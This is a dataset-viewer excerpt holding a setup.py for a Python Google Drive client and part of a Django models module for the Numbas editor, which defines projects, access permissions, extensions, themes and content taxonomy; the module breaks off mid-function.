ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a37bde1cef301c86424d495dc0865826f9789ab | # -*- coding: UTF-8 -*-
import os
from setuptools import setup
from typing import List
def _get_relative_path(file_path: str) -> str:
return os.path.join(os.path.dirname(__file__), file_path)
def load_requirements() -> List[str]:
# Load requirements
requirements = [] # type: List[str]
with open(_get_relative_path("requirements.txt"), "r") as req_file:
lines = [line.rstrip("\n") for line in req_file]
lines = list(filter(lambda line: line != "" and line[0] != "#", lines))
for line in lines:
hash_pos = line.find("#")
if hash_pos != -1:
requirements.append(line[:hash_pos].strip())
else:
requirements.append(line)
return requirements
def main():
drive_ns = {}
with open(_get_relative_path("drive/__version__.py")) as f:
exec(f.read(), drive_ns)
setup(
name='drive',
version=drive_ns["__version__"],
author='Baptiste Fontaine',
author_email='[email protected]',
packages=['drive', 'drive.cli'],
url='https://github.com/NoName115/drive',
license='MIT License',
description='Google Drive client',
long_description=open('README.md', encoding='utf-8').read(),
long_description_content_type='text/markdown',
install_requires=load_requirements(),
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
entry_points={
"console_scripts": [
"gd-upload=drive.cli.upload:main",
"gd-download=drive.cli.download:main",
]
}
)
if __name__ == "__main__":
main()
|
py | 1a37beacc600417af3c8c484eb8242958b934420 | import uuid
import os
import re
from copy import deepcopy
import shutil
from zipfile import ZipFile
import json
from datetime import datetime
from itertools import groupby
import codecs
from pathlib import Path
import urllib.parse
try:
# For Python > 2.7
from collections import OrderedDict
except ImportError:
# For Python < 2.6 (after installing ordereddict)
from ordereddict import OrderedDict
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.staticfiles import finders
from django.core.exceptions import ValidationError
from django.core.files.storage import default_storage
from django.urls import reverse
from django.db import models, transaction
from django.db.models import signals, Max, Min
from django.db.models.functions import Lower
from django.dispatch import receiver
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.db.models import Q
from django.forms import model_to_dict
from django.utils import timezone
from django.utils.deconstruct import deconstructible
from django.template.loader import get_template
from django.core.mail import send_mail
from .slugify import slugify
import reversion
import reversion.models
from notifications.signals import notify
from notifications.models import Notification
import taggit.models
from taggit.managers import TaggableManager
import numbasobject
from .notify_watching import notify_watching
from .jsonfield import JSONField
PUBLIC_ACCESS_CHOICES = (('hidden', 'Hidden'), ('view', 'Public can view'), ('edit', 'Public can edit'))
USER_ACCESS_CHOICES = (('view', 'Can view'), ('edit', 'Can edit'))
@deconstructible
class ControlledObject(object):
superuser_sees_everything = True
@property
def owner(self):
raise NotImplementedError
def has_access(self, user, accept_levels):
raise NotImplementedError
def can_be_viewed_by(self, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return True
accept_levels = ('view', 'edit')
try:
if self.published and self.public_access in accept_levels:
return True
except AttributeError:
pass
return (self.superuser_sees_everything and user.is_superuser) or (self.owner == user) or (self.has_access(user, accept_levels))
def can_be_copied_by(self, user):
if not self.can_be_viewed_by(user):
return False
if user.is_superuser or self.owner == user or self.has_access(user, ('edit',)):
return True
elif not self.licence:
return False
else:
return self.licence.can_reuse and self.licence.can_modify
def can_be_deleted_by(self, user):
return user == self.owner
def can_be_edited_by(self, user):
try:
if self.public_access == 'edit':
return True
except AttributeError:
pass
return (user.is_superuser) or (self.owner == user) or self.has_access(user, ('edit',))
def __eq__(self, other):
return True
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if user.is_superuser and cls.superuser_sees_everything:
return Q()
elif user.is_anonymous:
return Q(published=True, public_access__in=view_perms)
else:
return (Q(accesses__user=user, accesses__access__in=view_perms)
| Q(published=True, public_access__in=view_perms)
| Q(author=user)
| Q(project__projectaccess__user=user)
| Q(project__owner=user)
)
class TimelineMixin(object):
"""
A model which produces a timeline item when it is created.
Models inheriting from this should implement either
* self.object, or
* self.timeline_object() and self.can_be_deleted_by(user)
as well as a GenericRelation `timelineitems` to TimelineItem
"""
def can_be_deleted_by(self, user):
try:
if self.object.author == user:
return True
except AttributeError:
pass
return user == self.user
def can_be_viewed_by(self, user):
raise NotImplementedError
def timeline_object(self):
try:
return self.object
except AttributeError:
ct = ContentType.objects.get(pk=self.object_content_type.pk)
return ct.get_object_for_this_type(pk=self.object_id)
@property
def timelineitem(self):
return self.timelineitems.get()
LOCALE_CHOICES = [(y, x) for x, y in settings.GLOBAL_SETTINGS['NUMBAS_LOCALES']]
def combine_access(*args):
order = ['view','edit']
return sorted(args,key=order.index)[-1]
def reassign_content(from_user,to_user):
with transaction.atomic():
for p in from_user.own_projects.all():
p.owner = to_user
p.save()
for pa in from_user.project_memberships.all():
try:
pa2 = ProjectAccess.objects.get(user=to_user,project=pa.project)
access = combine_access(pa.access,pa2.access)
if access!=pa2.access:
pa2.access = access
pa2.save()
except ProjectAccess.DoesNotExist:
pa.user = to_user
pa.save()
for e in from_user.own_extensions.all():
e.author = to_user
e.save()
for t in from_user.own_themes.all():
t.author = to_user
t.save()
for cpt in from_user.own_custom_part_types.all():
cpt.author = to_user
cpt.save()
for r in from_user.resources.all():
r.owner = to_user
r.save()
for a in from_user.item_accesses.all():
try:
a2 = Access.objects.get(user=to_user,item=a.item)
access = combine_access(a.access,a2.access)
if access!=a2.access:
a2.access = access
a2.save()
except Access.DoesNotExist:
a.user = to_user
a.save()
for ei in from_user.own_items.all():
ei.author = to_user
ei.save()
class Project(models.Model, ControlledObject):
name = models.CharField(max_length=200)
owner = models.ForeignKey(User, related_name='own_projects', on_delete=models.CASCADE)
permissions = models.ManyToManyField(User, through='ProjectAccess')
timeline = GenericRelation('TimelineItem', related_query_name='projects', content_type_field='timeline_content_type', object_id_field='timeline_id')
public_view = models.BooleanField(default=False)
watching_non_members = models.ManyToManyField(User, related_name='watched_projects')
unwatching_members = models.ManyToManyField(User, related_name='unwatched_projects')
icon = 'briefcase'
description = models.TextField(blank=True)
default_locale = models.CharField(max_length=10, editable=True, default='en-GB')
default_licence = models.ForeignKey('Licence', null=True, blank=True, on_delete=models.SET_NULL)
custom_part_types = models.ManyToManyField('CustomPartType', related_name='projects')
class Meta:
ordering = ['name']
def can_be_edited_by(self, user):
return (user.is_superuser) or (self.owner == user) or self.has_access(user, ('edit',))
def can_be_viewed_by(self, user):
return self.public_view or super(Project, self).can_be_viewed_by(user)
def get_absolute_url(self):
return reverse('project_index', args=(self.pk,))
def has_access(self, user, levels):
if user.is_anonymous:
return False
if user==self.owner:
return True
return ProjectAccess.objects.filter(project=self, user=user, access__in=levels).exists()
def members(self):
return [self.owner]+self.non_owner_members()
def non_owner_members(self):
return list(User.objects.filter(project_memberships__project=self).exclude(pk=self.owner.pk))
def all_timeline(self):
items = self.timeline.all() | TimelineItem.objects.filter(editoritems__project=self)
items.order_by('-date')
return items
@property
def watching_users(self):
q = (User.objects.filter(pk=self.owner.pk) | User.objects.filter(project_memberships__project=self) | self.watching_non_members.all()).distinct()
return q.exclude(pk__in=self.unwatching_members.all())
def __str__(self):
return self.name
def num_published_questions(self):
return self.items.questions().filter(published=True).count()
def num_published_exams(self):
return self.items.exams().filter(published=True).count()
def folder_hierarchy(self):
folders = self.folders.all()
tree = []
folder_dict = {f.pk: {'folder': f, 'subfolders': []} for f in folders}
for f in folders:
if f.parent and f.parent.pk in folder_dict:
folder_dict[f.parent.pk]['subfolders'].append(folder_dict[f.pk])
else:
tree.append(folder_dict[f.pk])
return tree
def get_folder_breadcrumbs(self,path):
breadcrumbs = []
if len(path):
parent = None
for name in path.split('/'):
try:
folder = self.folders.get(name=urllib.parse.unquote(name),parent=parent)
except Folder.MultipleObjectsReturned:
folders = self.folders.filter(name=urllib.parse.unquote(name),parent=parent)
folder = folders[0]
with transaction.atomic():
for ofolder in folders[1:]:
ofolder.merge_into(folder)
breadcrumbs.append(folder)
parent = folder
return breadcrumbs
def get_folder(self,path):
breadcrumbs = self.get_folder_breadcrumbs(path)
if len(breadcrumbs):
return breadcrumbs[-1]
else:
return None
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if user.is_superuser and cls.superuser_sees_everything:
return Q()
elif user.is_anonymous:
return Q(public_view=True)
else:
return (Q(projectaccess__user=user, projectaccess__access__in=view_perms)
| Q(public_view=True)
| Q(owner=user)
)
class ProjectAccess(models.Model, TimelineMixin):
project = models.ForeignKey(Project, on_delete=models.CASCADE, related_name='projectaccess')
user = models.ForeignKey(User, related_name='project_memberships', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='project_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_deleted_by(self, user):
return self.project.can_be_edited_by(user)
def can_be_viewed_by(self, user):
return self.project.can_be_viewed_by(user)
def timeline_object(self):
return self.project
timeline_noun = 'project'
def icon(self):
return 'eye-open'
class Meta:
unique_together = (("project", "user"),)
class ProjectInvitation(models.Model):
email = models.EmailField()
invited_by = models.ForeignKey(User, on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
project = models.ForeignKey(Project, related_name='invitations', on_delete=models.CASCADE)
applied = models.BooleanField(default=False)
def __str__(self):
return "Invitation for {} to join {}".format(self.email, self.project)
@receiver(signals.post_save, sender=ProjectInvitation)
def send_project_invitation(instance, created, **kwargs):
if created:
template = get_template('project/invitation_email.txt')
content = template.render({'invitation':instance, 'SITE_TITLE':settings.SITE_TITLE})
subject = 'Invitation to join project "{}", on {}'.format(instance.project.name, settings.SITE_TITLE)
send_mail(subject, content, from_email=settings.DEFAULT_FROM_EMAIL, recipient_list=(instance.email,))
@receiver(signals.post_save, sender=User)
def apply_project_invitations(instance, created, **kwargs):
if created:
invitations = ProjectInvitation.objects.filter(email__iexact=instance.email)
for invitation in invitations:
project = invitation.project
if not project.has_access(instance,(invitation.access,)):
try:
access = ProjectAccess.objects.get(project=project,user=instance)
access.access = invitation.access
access.save()
except ProjectAccess.DoesNotExist:
ProjectAccess.objects.create(project=invitation.project, user=instance, access=invitation.access)
invitation.applied = True
invitation.save()
class EditorTag(taggit.models.TagBase):
official = models.BooleanField(default=False)
class Meta:
verbose_name = 'tag'
ordering = ['name']
def used_count(self):
return self.tagged_items.count()
#check that the .exam file for an object is valid and defines at the very least a name
def validate_content(content):
try:
obj = numbasobject.NumbasObject(content)
if not 'name' in obj.data:
raise ValidationError('No "name" property in content.')
except Exception as err:
raise ValidationError(err)
class EditablePackageMixin(object):
"""
A package whose contents can be edited by users with the right access privileges.
Extensions and themes are editable packages.
"""
package_noun = None
def filenames(self):
top = Path(self.extracted_path)
for d,dirs,files in os.walk(str(top)):
rd = Path(d).relative_to(top)
if str(rd)=='.' or not re.match(r'^\.',str(rd)):
for f in sorted(files,key=str):
if not re.match(r'^\.',f):
yield str(rd / f)
def write_file(self,filename,content):
root = os.path.abspath(self.extracted_path)
path = os.path.abspath(os.path.join(root,filename))
if not path.startswith(root+os.sep):
raise Exception("You may not write a file outside the {package_noun}'s directory".format(package_noun=self.package_noun))
dpath = Path(path).parent
dpath.mkdir(parents=True,exist_ok=True)
with open(path,'w',encoding='utf-8') as f:
f.write(content)
@property
def relative_extracted_path(self):
raise NotImplementedError
@property
def extracted_path(self):
return os.path.join(os.getcwd(), settings.MEDIA_ROOT, self.relative_extracted_path)
def url_for(self, filename):
return settings.MEDIA_URL+self.relative_extracted_path+'/'+filename
def ensure_extracted_path_exists(self):
if os.path.exists(self.extracted_path):
shutil.rmtree(self.extracted_path)
os.makedirs(self.extracted_path)
@property
def readme_filename(self):
names = ['README.md','README.html','README']
for name in names:
if self.has_file(name):
return name
return names[0]
def has_file(self, filename):
return os.path.exists(os.path.join(self.extracted_path,filename))
class Extension(models.Model, ControlledObject, EditablePackageMixin):
name = models.CharField(max_length=200, help_text='A human-readable name for the extension')
location = models.CharField(default='', max_length=200, help_text='A unique identifier for this extension', verbose_name='Short name', blank=True, unique=True)
url = models.CharField(max_length=300, blank=True, verbose_name='Documentation URL', help_text='Address of a page about the extension. Leave blank to use the README file.')
public = models.BooleanField(default=False, help_text='Can this extension be seen by everyone?')
slug = models.SlugField(max_length=200, editable=False, unique=False, default='an-extension')
author = models.ForeignKey(User, related_name='own_extensions', blank=True, null=True, on_delete=models.CASCADE)
last_modified = models.DateTimeField(auto_now=True)
zipfile_folder = 'user-extensions'
zipfile = models.FileField(upload_to=zipfile_folder+'/zips', blank=True, null=True, max_length=255, verbose_name='Extension package', help_text='A .zip package containing the extension\'s files')
editable = models.BooleanField(default=True, help_text='Is this extension stored within the editor\'s media folder?')
runs_headless = models.BooleanField(default=True, help_text='Can this extension run outside a browser?')
superuser_sees_everything = False
package_noun = 'extension'
timeline_noun = 'extension'
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def can_be_edited_by(self, user):
return (user.is_superuser) or (self.author == user) or self.has_access(user, ('edit',))
def can_be_viewed_by(self, user):
return self.public or super().can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return user == self.author
def has_access(self, user, levels):
if user.is_anonymous:
return False
if user==self.author:
return True
return ExtensionAccess.objects.filter(extension=self, user=user, access__in=levels).exists()
@property
def owner(self):
return self.author
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if cls.superuser_sees_everything and user.is_superuser:
return Q()
elif user.is_anonymous:
return Q(public=True)
else:
return (Q(access__user=user, access__access__in=view_perms)
| Q(public=True)
| Q(author=user)
)
def as_json(self):
d = {
'name': self.name,
'url': reverse('extension_documentation',args=(self.pk,)),
'pk': self.pk,
'location': self.location,
'author': self.author.pk if self.author is not None else None,
'edit_url': reverse('extension_edit', args=(self.pk,)),
}
path = self.script_path
if path is not None:
d['hasScript'] = True
d['scriptURL'] = path
return d
@property
def main_filename(self):
return self.location+'.js'
@property
def script_path(self):
if self.editable:
filename = self.main_filename
local_path = os.path.join(self.extracted_path, filename)
if os.path.exists(local_path):
return settings.MEDIA_URL+self.zipfile_folder+'/extracted/'+str(self.pk)+'/'+self.location+'/'+filename
else:
path = 'js/numbas/extensions/%s/%s.js' % (self.location, self.location)
if finders.find(path):
return settings.STATIC_URL+path
return None
@property
def relative_extracted_path(self):
if self.pk is None:
raise Exception("This object doesn't have an ID yet.")
return os.path.join(self.zipfile_folder, 'extracted', str(self.pk), self.location)
@property
def extracted_path(self):
if self.editable:
return super().extracted_path
else:
return os.path.join(settings.GLOBAL_SETTINGS['NUMBAS_PATH'], 'extensions', self.location)
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(Extension, self).save(*args, **kwargs)
def extract_zip(self):
if not self.zipfile:
return
self.ensure_extracted_path_exists()
_, extension = os.path.splitext(self.zipfile.name)
if extension.lower() == '.zip':
z = ZipFile(self.zipfile.file, 'r')
z.extractall(self.extracted_path)
elif extension.lower() == '.js':
file = open(os.path.join(self.extracted_path, self.location+'.js'), 'wb')
file.write(self.zipfile.file.read())
file.close()
def get_absolute_url(self):
return reverse('extension_documentation',args=(self.pk,))
def icon(self):
return 'wrench'
@receiver(signals.pre_save)
def extract_editable_package_zip_pre(sender,instance,**kwargs):
if not isinstance(instance,EditablePackageMixin):
return
changed_zipfile = False
if instance.zipfile:
try:
old_extension = instance.__class__.objects.get(pk=instance.pk)
changed_zipfile = old_extension.zipfile != instance.zipfile
except instance.__class__.DoesNotExist:
changed_zipfile = True
instance.__changed_zipfile = changed_zipfile
@receiver(signals.post_save)
def extract_editable_package_zip_post(sender,instance,**kwargs):
if not isinstance(instance,EditablePackageMixin):
return
if getattr(instance,'__changed_zipfile',False):
instance.extract_zip()
@receiver(signals.pre_delete, sender=Extension)
def delete_extracted_extension(sender,instance,**kwargs):
if not instance.editable:
return
p = Path(instance.extracted_path).parent
if p.exists():
shutil.rmtree(str(p))
class ExtensionAccess(models.Model, TimelineMixin):
extension = models.ForeignKey('Extension', related_name='access', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='extension_accesses', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='extension_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_viewed_by(self, user):
return self.extension.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return self.extension.can_be_deleted_by(user)
def timeline_object(self):
return self.extension
class Theme(models.Model, ControlledObject, EditablePackageMixin):
name = models.CharField(max_length=200)
public = models.BooleanField(default=False, help_text='Can this theme be seen by everyone?')
slug = models.SlugField(max_length=200, editable=False, unique=False)
author = models.ForeignKey(User, related_name='own_themes', on_delete=models.CASCADE)
last_modified = models.DateTimeField(auto_now=True)
zipfile_folder = 'user-themes'
zipfile = models.FileField(upload_to=zipfile_folder+'/zips', max_length=255, verbose_name='Theme package', help_text='A .zip package containing the theme\'s files')
package_noun = 'theme'
timeline_noun = 'theme'
editable = True
def __str__(self):
return self.name
def can_be_viewed_by(self, user):
return self.public or super().can_be_viewed_by(user)
def has_access(self, user, levels):
if user.is_anonymous:
return False
if user==self.author:
return True
return ThemeAccess.objects.filter(theme=self, user=user, access__in=levels).exists()
@property
def owner(self):
return self.author
@classmethod
def filter_can_be_viewed_by(cls, user):
if getattr(settings, 'EVERYTHING_VISIBLE', False):
return Q()
view_perms = ('edit', 'view')
if cls.superuser_sees_everything and user.is_superuser:
return Q()
elif user.is_anonymous:
return Q(public=True)
else:
return (Q(access__user=user, access__access__in=view_perms)
| Q(public=True)
| Q(author=user)
)
@property
def relative_extracted_path(self):
return os.path.join(self.zipfile_folder, 'extracted', str(self.pk))
@property
def main_filename(self):
if self.has_file('inherit.txt'):
return 'inherit.txt'
else:
return self.readme_filename
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(Theme, self).save(*args, **kwargs)
def extract_zip(self):
if not self.zipfile:
return
self.ensure_extracted_path_exists()
z = ZipFile(self.zipfile.file, 'r')
z.extractall(self.extracted_path)
def get_absolute_url(self):
return reverse('theme_edit',args=(self.pk,))
def icon(self):
return 'sunglasses'
class ThemeAccess(models.Model, TimelineMixin):
theme = models.ForeignKey('Theme', related_name='access', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='theme_accesses', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='theme_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_viewed_by(self, user):
return self.theme.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return self.theme.can_be_deleted_by(user)
def timeline_object(self):
return self.theme
@receiver(signals.pre_delete, sender=Theme)
def reset_theme_on_delete(sender, instance, **kwargs):
default_theme = settings.GLOBAL_SETTINGS['NUMBAS_THEMES'][0][1]
for exam in instance.used_in_newexams.all():
exam.custom_theme = None
exam.theme = default_theme
exam.save()
CUSTOM_PART_TYPE_PUBLIC_CHOICES = [
('restricted', 'Only to permitted users'),
('always', 'Always available'),
('select', 'When selected'),
]
CUSTOM_PART_TYPE_INPUT_WIDGETS = [
('string', 'String'),
('number', 'Number'),
('jme', 'Mathematical expression'),
('matrix', 'Matrix'),
('radios', 'Radio buttons'),
('checkboxes', 'Choose several from a list'),
('dropdown', 'Drop-down box'),
]
class CustomPartType(models.Model, ControlledObject):
author = models.ForeignKey(User, related_name='own_custom_part_types', on_delete=models.CASCADE)
name = models.CharField(max_length=200, verbose_name='Name')
short_name = models.CharField(max_length=200, unique=True, verbose_name='Unique identifier for this part type')
description = models.TextField(default='', blank=True, verbose_name='What\'s this part type for?')
input_widget = models.CharField(max_length=200, choices = CUSTOM_PART_TYPE_INPUT_WIDGETS, verbose_name='Answer input method')
input_options = JSONField(blank=True, verbose_name='Options for the answer input method')
can_be_gap = models.BooleanField(default=True, verbose_name='Can this part be a gap?')
can_be_step = models.BooleanField(default=True, verbose_name='Can this part be a step?')
marking_script = models.TextField(default='', blank=True, verbose_name='Marking algorithm')
marking_notes = JSONField(blank=True,default='[]', verbose_name='Marking algorithm notes')
settings = JSONField(blank=True)
help_url = models.URLField(blank=True, verbose_name='URL of documentation')
public_availability = models.CharField(max_length=10, choices=CUSTOM_PART_TYPE_PUBLIC_CHOICES, verbose_name='Public availability', default='restricted')
ready_to_use = models.BooleanField(default=False, verbose_name='Ready to use?')
copy_of = models.ForeignKey('self', null=True, related_name='copies', on_delete=models.SET_NULL)
extensions = models.ManyToManyField(Extension, blank=True)
def copy(self, author, name):
new_type = CustomPartType.objects.get(pk=self.pk)
new_type.pk = None
new_type.id = None
new_type.author = author
new_type.public_availability = 'restricted'
new_type.name = name
new_type.set_short_name(slugify(name))
new_type.copy_of = self
new_type.save()
new_type.extensions.set(self.extensions.all())
return new_type
def __str__(self):
return self.name
@property
def filename(self):
return slugify(self.name)
def __repr__(self):
return '<CustomPartType: {}>'.format(self.short_name)
def get_absolute_url(self):
return reverse('custom_part_type_edit', args=(self.pk,))
@property
def owner(self):
return self.author
def set_short_name(self, slug):
built_in_part_types = ['jme','numberentry','patternmatch','matrix','gapfill','information','extension','1_n_2','m_n_2','m_n_x']
if slug in built_in_part_types:
slug = 'custom-'+slug
short_name = slug
i = 0
while CustomPartType.objects.exclude(pk=self.pk).filter(short_name=short_name).exists():
i += 1
short_name = '{}-{}'.format(slug,i)
self.short_name = short_name
def has_access(self, user, levels):
if 'view' in levels:
if self.published:
return True
if user.is_anonymous:
return False
if user==self.owner:
return True
return False
def can_be_copied_by(self, user):
return user.is_superuser or self.owner == user or self.published
@property
def published(self):
return self.public_availability != 'restricted'
def as_json(self):
return {
'source': {
'pk': self.pk,
'author': {
'name': self.author.get_full_name(),
'pk': self.author.pk,
},
'edit_page': reverse('custom_part_type_edit', args=(self.pk,)),
},
'name': self.name,
'short_name': self.short_name,
'description': self.description,
'help_url': self.help_url,
'input_widget': self.input_widget,
'input_options': self.input_options,
'can_be_gap': self.can_be_gap,
'can_be_step': self.can_be_step,
'marking_script': self.marking_script,
'marking_notes': self.marking_notes,
'settings': self.settings,
'public_availability': self.public_availability,
'published': self.published,
'extensions': [e.location for e in self.extensions.all()],
}
def as_source(self):
obj = self.as_json()
obj['source'] = {
'author': {
'name': self.author.get_full_name(),
}
}
return obj
class Resource(models.Model):
owner = models.ForeignKey(User, related_name='resources', on_delete=models.CASCADE)
date_created = models.DateTimeField(auto_now_add=True)
file = models.FileField(upload_to='question-resources/', max_length=255)
alt_text = models.TextField(blank=True)
def __str__(self):
return self.file.name
@property
def resource_url(self):
return 'resources/%s' % self.file.name
@property
def filetype(self):
name,ext = os.path.splitext(self.file.name)
return ext
def get_created_time(self):
return default_storage.get_created_time(self.file.name)
def is_image(self):
return self.filetype.lower() in ('.png','.jpg','.svg','.gif')
def delete(self, *args, **kwargs):
self.file.delete(save=False)
super(Resource, self).delete(*args, **kwargs)
def as_json(self):
return {
'url': self.resource_url,
'name': self.file.name,
'pk': self.pk,
'alt_text': self.alt_text,
}
class Licence(models.Model):
name = models.CharField(max_length=80, unique=True)
short_name = models.CharField(max_length=20, unique=True)
can_reuse = models.BooleanField(default=True)
can_modify = models.BooleanField(default=True)
can_sell = models.BooleanField(default=True)
url = models.URLField(blank=True)
full_text = models.TextField(blank=True)
def __str__(self):
return self.name
def as_json(self):
return {
'name': self.name,
'short_name': self.short_name,
'can_reuse': self.can_reuse,
'can_modify': self.can_modify,
'can_sell': self.can_sell,
'url': self.url,
'pk': self.pk,
}
STAMP_STATUS_CHOICES = (
('ok', 'Ready to use'),
('dontuse', 'Should not be used'),
('problem', 'Has some problems'),
('broken', 'Doesn\'t work'),
('pleasetest', 'Needs to be tested'),
)
class AbilityFramework(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
ABILITY_PRECISION = 10
class AbilityLevel(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
start = models.DecimalField(max_digits=ABILITY_PRECISION+1, decimal_places=ABILITY_PRECISION)
end = models.DecimalField(max_digits=ABILITY_PRECISION+1, decimal_places=ABILITY_PRECISION)
framework = models.ForeignKey(AbilityFramework, related_name='levels', on_delete=models.CASCADE)
class Meta:
ordering = ('framework', 'start',)
def __str__(self):
return self.name
class Subject(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
class Topic(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
subjects = models.ManyToManyField(Subject)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
class Taxonomy(models.Model):
name = models.CharField(max_length=200, blank=False, unique=True)
description = models.TextField(blank=False)
json = JSONField(blank=True) # the JSON encoding of the taxonomy's nodes takes a while, and a lot of database queries, to make, so it's stored here and updated each time a node changes
class Meta:
verbose_name_plural = 'taxonomies'
def __str__(self):
return self.name
def forest(self):
"""
The nodes in the taxonomy, returned as a list of trees associating each node to its children.
"""
key = lambda n:(len(n.code),n.code)
def make_tree(node):
return [(n,make_tree(n)) for n in sorted(node.children.all(), key=key)]
return [(n,make_tree(n)) for n in sorted(self.nodes.filter(parent=None),key=key)]
def create_json(self):
def tree_json(leaves):
return [{
'pk': node.pk,
'name': node.name,
'code': node.code,
'children': tree_json(kids)
} for node,kids in leaves]
self.json = tree_json(self.forest())
return self.json
class TaxonomyNode(models.Model):
name = models.CharField(max_length=200, blank=False, unique=False)
parent = models.ForeignKey('TaxonomyNode', on_delete = models.CASCADE, related_name='children', blank=True, null=True)
taxonomy = models.ForeignKey(Taxonomy, related_name='nodes', on_delete=models.CASCADE)
code = models.CharField(max_length=200, blank=False)
def __str__(self):
return self.name
@receiver(signals.post_save, sender=TaxonomyNode)
def update_taxonomy_json(instance, **kwargs):
t = instance.taxonomy
t.create_json()
t.save()
class AbilityLevelField(models.FloatField):
pass
class TaggedItem(taggit.models.GenericTaggedItemBase):
tag = models.ForeignKey(EditorTag, related_name='tagged_editoritems', on_delete=models.CASCADE)
class TaggedQuestion(taggit.models.GenericTaggedItemBase):
tag = models.ForeignKey(EditorTag, related_name='tagged_items', on_delete=models.CASCADE)
class Access(models.Model, TimelineMixin):
item = models.ForeignKey('EditorItem', related_name='accesses', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='item_accesses', on_delete=models.CASCADE)
access = models.CharField(default='view', editable=True, choices=USER_ACCESS_CHOICES, max_length=6)
timelineitems = GenericRelation('TimelineItem', related_query_name='item_accesses', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/access.html'
def can_be_viewed_by(self, user):
return self.item.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return self.item.can_be_deleted_by(user)
def timeline_object(self):
return self.item
def icon(self):
return 'eye-open'
NUMBAS_FILE_VERSION = 'exam_results_page_options'
@deconstructible
class NumbasObject(object):
def get_parsed_content(self):
if self.content:
self.parsed_content = numbasobject.NumbasObject(self.content)
self.name = self.parsed_content.data['name']
elif self.name:
self.parsed_content = numbasobject.NumbasObject(data={'name': self.name}, version=NUMBAS_FILE_VERSION)
self.metadata = self.parsed_content.data.get('metadata', self.metadata)
self.content = str(self.parsed_content)
return self.parsed_content
def set_name(self, name):
self.name = name
if self.content:
self.get_parsed_content()
self.parsed_content.data['name'] = name
self.content = str(self.parsed_content)
self.save()
def __eq__(self, other):
return self.content == other.content
class EditorItemManager(models.Manager):
def questions(self):
return self.exclude(question=None)
def exams(self):
return self.exclude(exam=None)
def published(self):
return self.filter(published=True)
class Contributor(models.Model):
item = models.ForeignKey('EditorItem', on_delete=models.CASCADE, related_name='contributors')
user = models.ForeignKey(User, related_name='item_contributions', on_delete=models.CASCADE, blank=True, null=True)
name = models.CharField(max_length=200,blank=True)
profile_url = models.URLField(blank=True)
def __str__(self):
name = self.user.get_full_name() if self.user else self.name
return '{} on "{}"'.format(name,self.item)
def as_json(self, request):
if self.user:
user = self.user
profile_url = reverse('view_profile',args=(user.pk,))
if request:
profile_url = request.build_absolute_uri(profile_url)
return {
'name': user.get_full_name(),
'profile_url': profile_url,
}
else:
return {
'name': self.name,
'profile_url': self.profile_url,
}
class Meta:
unique_together = (("item","user"))
class Folder(models.Model):
name = models.CharField(max_length=200)
project = models.ForeignKey(Project, null=False, related_name='folders', on_delete=models.CASCADE)
parent = models.ForeignKey('Folder', null=True, related_name='folders', on_delete=models.CASCADE)
class Meta:
unique_together = (('name', 'project', 'parent'),)
ordering = ('name',)
def clean(self):
if self.parent==self:
raise ValidationError("A folder can't be its own parent.")
def __str__(self):
return '/'.join([self.project.name]+[f.name for f in self.parents()])
def parents(self):
bits = []
f = self
while f:
bits.insert(0,f)
f = f.parent
return bits
def path(self):
return '/'.join(urllib.parse.quote(f.name) for f in self.parents())
def get_absolute_url(self):
return reverse('project_browse',args=(self.project.pk, self.path()+'/'))
def as_json(self):
return {
'pk': self.pk,
'url': self.get_absolute_url(),
'name': self.name,
}
def merge_into(self,folder):
for item in self.items.all():
item.folder = folder
item.save()
for subfolder in Folder.objects.filter(parent=self):
subfolder.parent = folder
subfolder.save()
self.delete()
def all_contents(self):
queue = [self]
folders = []
items = []
while queue:
f = queue.pop()
folders.append(f)
items += f.items.all()
